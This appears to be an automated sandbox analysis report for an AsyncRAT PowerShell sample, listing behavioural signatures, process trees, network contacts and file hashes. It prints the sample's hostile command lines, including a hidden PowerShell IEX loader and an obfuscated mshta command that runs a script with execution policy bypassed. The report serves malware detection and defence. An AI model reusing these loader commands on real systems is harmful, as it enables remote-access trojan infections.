Analysis Overview
SHA256
c671d25e21e83929c1853e697f29b0e8ed3b69edc6add61d4d8b8bc2018afe14
Threat Level: Known bad
The file 390Z21.ps1 was found to be: Known bad.
Malicious Activity Summary
AsyncRat
Async RAT payload
Checks computer location settings
Suspicious use of SetThreadContext
Enumerates physical storage devices
Modifies registry class
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2023-03-22 13:58
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2023-03-22 13:58
Reported
2023-03-22 14:00
Platform
win7-20230220-en
Max time kernel
30s
Max time network
33s
Command Line
Signatures
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 920 wrote to memory of 1612 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WScript.exe |
| PID 920 wrote to memory of 1612 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WScript.exe |
| PID 920 wrote to memory of 1612 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WScript.exe |
| PID 1612 wrote to memory of 1928 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1612 wrote to memory of 1928 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1612 wrote to memory of 1928 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\390Z21.ps1
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\Document\BT.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{$BLNLS='ReadAllText';$T='C:\ProgramData\Document\BT.ps1';IEx([<#1#>IO.File<#1#>]::$BLNLS($T))}
Network
Files
memory/920-58-0x000000001B210000-0x000000001B4F2000-memory.dmp
memory/920-59-0x0000000001F50000-0x0000000001F58000-memory.dmp
memory/920-60-0x0000000002860000-0x00000000028E0000-memory.dmp
memory/920-61-0x0000000002860000-0x00000000028E0000-memory.dmp
memory/920-62-0x0000000002860000-0x00000000028E0000-memory.dmp
memory/920-63-0x0000000002860000-0x00000000028E0000-memory.dmp
C:\ProgramData\Document\BT.vbs
| MD5 | d81d9785f8a33a52adbf7761bb81483c |
| SHA1 | c7f97c27e4ad633369c9eca1be36335356486727 |
| SHA256 | cd30619863fb29e056c285521902eda2d820052f5cbc7a5d92ad331eab6460c4 |
| SHA512 | 0c08b68c6b64a57ba4494e20b5c840f3f013aa2873d03aa1d2a017c707614479afe024cfd1cdde17851d0f36cfc34a895eea1e41d4a4118067ec366c19bf41cf |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | fad44b01e866d0051a92d87f4efdcd11 |
| SHA1 | 5621d7f2112244eeddeb808c90228f186912f104 |
| SHA256 | 6773394ae74f2281eec983ab592741f74ee367457111687bd3298fbf2d061c4b |
| SHA512 | de7f1db7409a0315c0b36001435a8dc2e03789b8b37b2a11adc9a85919a6f06901a7c975a864f2303ca1b5136e51ba534f38ffc8046d5c0b2993574cb84a4c16 |
memory/1928-76-0x000000001B0A0000-0x000000001B382000-memory.dmp
memory/1928-77-0x0000000002420000-0x0000000002428000-memory.dmp
memory/1928-78-0x0000000002894000-0x0000000002897000-memory.dmp
memory/1928-79-0x000000000289B000-0x00000000028D2000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2023-03-22 13:58
Reported
2023-03-22 14:00
Platform
win10v2004-20230220-en
Max time kernel
90s
Max time network
151s
Command Line
Signatures
AsyncRat
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\mshta.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1236 set thread context of 1936 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\390Z21.ps1
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\Document\BT.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -WindowStyle Hidden -ExecutionPolicy RemoteSigned -Command &{$BLNLS='ReadAllText';$T='C:\ProgramData\Document\BT.ps1';IEx([<#1#>IO.File<#1#>]::$BLNLS($T))}
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\schtasks\Document.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Document\Loader.bat" "
C:\Windows\system32\mshta.exe
mshta vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powe"+""+""+""+""+""+""+""+""+""+""+""+""+""+""+""+""+""+""+""+""+""+""+""+""+""+""+""+""+""+""+""+""+""+""+""+""+""+""+"rshell -Execu"+"tionP"+"olicy"+" Bypass & 'C:\ProgramData\Document\Document.ps1'"", 0:close")
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & 'C:\ProgramData\Document\Document.ps1'
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 142.145.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.38.195.152.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.81.184.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 161.252.72.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| FR | 185.81.157.244:6601 | tcp | |
| US | 8.8.8.8:53 | 244.157.81.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.232.18.117.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 52.168.112.66:443 | tcp | |
| US | 8.8.8.8:53 | 203.151.224.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_olm0lpyo.syo.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1484-138-0x000001B9A2040000-0x000001B9A2062000-memory.dmp
memory/1484-143-0x000001B985920000-0x000001B985930000-memory.dmp
memory/1484-144-0x000001B985920000-0x000001B985930000-memory.dmp
memory/1484-145-0x000001B985920000-0x000001B985930000-memory.dmp
C:\ProgramData\Document\BT.vbs
| MD5 | d81d9785f8a33a52adbf7761bb81483c |
| SHA1 | c7f97c27e4ad633369c9eca1be36335356486727 |
| SHA256 | cd30619863fb29e056c285521902eda2d820052f5cbc7a5d92ad331eab6460c4 |
| SHA512 | 0c08b68c6b64a57ba4494e20b5c840f3f013aa2873d03aa1d2a017c707614479afe024cfd1cdde17851d0f36cfc34a895eea1e41d4a4118067ec366c19bf41cf |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 223bd4ae02766ddc32e6145fd1a29301 |
| SHA1 | 900cfd6526d7e33fb4039a1cc2790ea049bc2c5b |
| SHA256 | 1022ec2fed08ff473817fc53893e192a8e33e6a16f3d2c8cb6fd37f49c938e1e |
| SHA512 | 648cd3f8a89a18128d2b1bf960835e087a74cdbc783dbfcc712b3cb9e3a2e4f715e534ba2ef81d89af8f60d4882f6859373248c875ceb26ad0922e891f2e74cc |
memory/4984-156-0x000001CE04C20000-0x000001CE04C30000-memory.dmp
memory/4984-162-0x000001CE04C20000-0x000001CE04C30000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 27fdb1beb89b56345e585d480be3026b |
| SHA1 | 2626e41ca27668518d01c04e1579f77027ff31a1 |
| SHA256 | ef8cd66cc241c6d899919ae6f8369334b20202bd4ad49acfa546d29300c533d2 |
| SHA512 | bd8208c8763ad8a6c25b6363b8e0e2a3c694e4e0cabfe4ce5d40945bd1f4274b7da976997f825e95c4455bf6b2e20b5bd960609b172f7c70d3521cb2ab24d49a |
C:\ProgramData\Document\BT.ps1
| MD5 | a185048be8e4dcc4af37a21033364350 |
| SHA1 | 6203dd67cf4e9958d52fe7fb8dd34e2364416046 |
| SHA256 | 3311eb6e7226e8e21c3ae7b3f29c9859d0be7b10736cb3883d5c453f59a41583 |
| SHA512 | 75b51d7cadfcd656d92431848809f62e3c902f20ddd36665eec41d92d622b62f4830b04094052df9c7fb8b827b0dad8d4589dbacb1e5c4bee65bbbc794c7d32c |
memory/4984-170-0x000001CE04C20000-0x000001CE04C30000-memory.dmp
C:\ProgramData\schtasks\Document.vbs
| MD5 | 3fdf59c6cc932ccfb273ee77a5338509 |
| SHA1 | dc0bfd3323aff0fdabd00f98496f30cb1a2aee5f |
| SHA256 | d8ded725a6dec74218c880a7c80c20755efecb0a8e3d82d5fae5963652c215e4 |
| SHA512 | e049dc02cc84139cd775fc1bfb901574b8fb2aff393a8da696f2602c8adda17bb0dfb62c19a31d8b15ade2179b5e54c41deacb3b01d785d1cb621dc0a0a0aa80 |
C:\ProgramData\Document\Loader.bat
| MD5 | aaff07ba1501352dabd41d75b0e8bb4f |
| SHA1 | d55ed9a18b657313801b7da2e2e5d79b1c0ae033 |
| SHA256 | b74497ce30b1a5e218bdad0bec6bd9ab24f38ab6881fa52c9f651f418bf6dc7a |
| SHA512 | 5afe35b094429427fd0c8e7194baa497d43c64a4d4a195e5789a145ab0ddc608a29e941f66d9dee2ded3e0253d501676c4632076bf6e5897383fc240a4d0f333 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 70595b5937369a2592a524db67e208d3 |
| SHA1 | d989b934d9388104189f365694e794835aa6f52f |
| SHA256 | be09b93a020e2e86a0b3c7c3f3d3e2c45f888944b1036df738385ede16f595c8 |
| SHA512 | edb412886187a2740eb7e284b16838bdd9f011aba1f4581f1fed25a86cdfe9b2ab4df863edeb3db6b072805439d57b10f3e0a1f2daabe1ee56db275ad2ad61e5 |
C:\ProgramData\Document\Document.ps1
| MD5 | 6e7968ef23d12120b090badbb5ab6c68 |
| SHA1 | a15cf14da3192a7e64fbd0e9ea90ad2c2ab03f18 |
| SHA256 | 05593d5c9e42cc15217ca2db5c27a955aa2cedae87c9471b2181aad36ca8edaa |
| SHA512 | 8d120fd8859ff68103a35fb342c799045cda3f92a039b844cfab18fd75f7a831afca2b95e68aadf864207b46eb40d8b96d5ba7fb44c2a1cf7d2c947fdcad929c |
memory/1236-187-0x000001C046290000-0x000001C0462A0000-memory.dmp
memory/1236-186-0x000001C046290000-0x000001C0462A0000-memory.dmp
memory/1936-188-0x0000000000400000-0x0000000000414000-memory.dmp
memory/1936-190-0x00000000056E0000-0x00000000056F0000-memory.dmp
memory/1936-191-0x0000000006070000-0x0000000006614000-memory.dmp
memory/1936-192-0x0000000005CB0000-0x0000000005D42000-memory.dmp
memory/1936-193-0x0000000005CA0000-0x0000000005CAA000-memory.dmp
memory/1936-196-0x0000000006D40000-0x0000000006DDC000-memory.dmp
memory/1936-197-0x0000000006DE0000-0x0000000006E46000-memory.dmp
memory/1936-198-0x00000000056E0000-0x00000000056F0000-memory.dmp